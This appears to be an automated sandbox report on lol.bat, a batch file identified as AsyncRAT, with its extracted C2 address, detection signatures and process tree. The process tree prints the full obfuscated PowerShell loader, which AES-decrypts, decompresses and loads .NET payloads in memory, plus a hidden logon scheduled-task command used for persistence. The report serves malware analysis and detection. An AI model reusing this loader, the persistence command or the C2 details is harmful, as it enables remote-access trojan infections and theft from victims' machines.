Analysis
- max time kernel: 79s
- max time network: 78s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 09-11-2024 16:16
- Static task: static1
- Behavioral task: behavioral1
- Sample: lol.bat
- Resource: win7-20240903-en
General
- Target: lol.bat
- Size: 279KB
- MD5: b5c81dca8f6b148790d14c93ba1788d4
- SHA1: 11fa7bdf65ac8b835b27c895f3d3e357f87a28f2
- SHA256: 7772e47f23947ab8ec3ccd03173e02e73252b906cc780681447049e12d4cb9cb
- SHA512: 14bb171192854a481b7d26ec69e3dc7ffbe55755c3191629697298553ce919d5b1bd4719531b271304a530e5a01478bad0167f6fb66ae8d869da1f34b8713b51
- SSDEEP: 6144:5toA7r23ZOt+yxLqRvs+wAbTXJuE/SzXm3+gK+4QpTz:4AsOkmqTPbTJuEcmut+ppTz
Malware Config
Extracted: asyncrat
- Default
  - C2: 127.0.0.1:32758
  - C2: pressure-continuous.gl.at.ply.gg:32758
- delay: 1
- install: false
- install_folder: %AppData%
Signatures
- Asyncrat family
- Async RAT payload (1 IoC)
  Processes:
  - resource: behavioral2/memory/448-46-0x000001F35AAA0000-0x000001F35AAB6000-memory.dmp, yara_rule: family_asyncrat
- Blocklisted process makes network request (2 IoCs)
  Processes (flow, pid, process):
  - 22, 448, powershell.exe
  - 24, 448, powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
  Run Powershell and hide display window.
  Processes (pid, process):
  - 448, powershell.exe
  - 3700, powershell.exe
  - 4428, powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes (description, ioc, process):
  - Key value queried, \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation, WScript.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry class (1 IoC)
  Processes (description, ioc, process):
  - Key created, \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings, powershell.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (pid, process):
  - 3700, powershell.exe (2 entries)
  - 4428, powershell.exe (2 entries)
  - 448, powershell.exe (all remaining entries)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (token, pid, process):
  - SeDebugPrivilege, 3700, powershell.exe
  - SeDebugPrivilege, 4428, powershell.exe
  - then, for 4428 powershell.exe, the following token sequence listed three times over (the third repetition ends at 35, where the 64-entry listing stops): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes (pid, description, target pid, process, procid_target):
  - 1580 wrote to memory of 3700, cmd.exe, 86
  - 1580 wrote to memory of 3700, cmd.exe, 86
  - 3700 wrote to memory of 4428, powershell.exe, 88
  - 3700 wrote to memory of 4428, powershell.exe, 88
  - 3700 wrote to memory of 2632, powershell.exe, 93
  - 3700 wrote to memory of 2632, powershell.exe, 93
  - 2632 wrote to memory of 3392, WScript.exe, 94
  - 2632 wrote to memory of 3392, WScript.exe, 94
  - 3392 wrote to memory of 448, cmd.exe, 96
  - 3392 wrote to memory of 448, cmd.exe, 96
Processes
- [1] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lol.bat"
  PID: 1580
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6FKXqM4AWzehcRMiEtEBJSZ307MDhrlms/qR1ZbmvDU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xXq5NOPfLug2n5zZd7UfxA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gIuVu=New-Object System.IO.MemoryStream(,$param_var); $DStlk=New-Object System.IO.MemoryStream; $aEunE=New-Object System.IO.Compression.GZipStream($gIuVu, [IO.Compression.CompressionMode]::Decompress); $aEunE.CopyTo($DStlk); $aEunE.Dispose(); $gIuVu.Dispose(); $DStlk.Dispose(); $DStlk.ToArray();}function execute_function($param_var,$param2_var){ $RzZmF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dlKfW=$RzZmF.EntryPoint; $dlKfW.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\lol.bat';$fQtTT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\lol.bat').Split([Environment]::NewLine);foreach ($zlOoi in $fQtTT) { if ($zlOoi.StartsWith(':: ')) { $QSoii=$zlOoi.Substring(3); break; }}$payloads_var=[string[]]$QSoii.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    PID: 3700
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_70_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_70.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      PID: 4428
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_70.vbs"
      PID: 2632
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_70.bat" "
        PID: 3392
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6FKXqM4AWzehcRMiEtEBJSZ307MDhrlms/qR1ZbmvDU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xXq5NOPfLug2n5zZd7UfxA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gIuVu=New-Object System.IO.MemoryStream(,$param_var); $DStlk=New-Object System.IO.MemoryStream; $aEunE=New-Object System.IO.Compression.GZipStream($gIuVu, [IO.Compression.CompressionMode]::Decompress); $aEunE.CopyTo($DStlk); $aEunE.Dispose(); $gIuVu.Dispose(); $DStlk.Dispose(); $DStlk.ToArray();}function execute_function($param_var,$param2_var){ $RzZmF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dlKfW=$RzZmF.EntryPoint; $dlKfW.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_70.bat';$fQtTT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_70.bat').Split([Environment]::NewLine);foreach ($zlOoi in $fQtTT) { if ($zlOoi.StartsWith(':: ')) { $QSoii=$zlOoi.Substring(3); break; }}$payloads_var=[string[]]$QSoii.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          PID: 448
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Downloads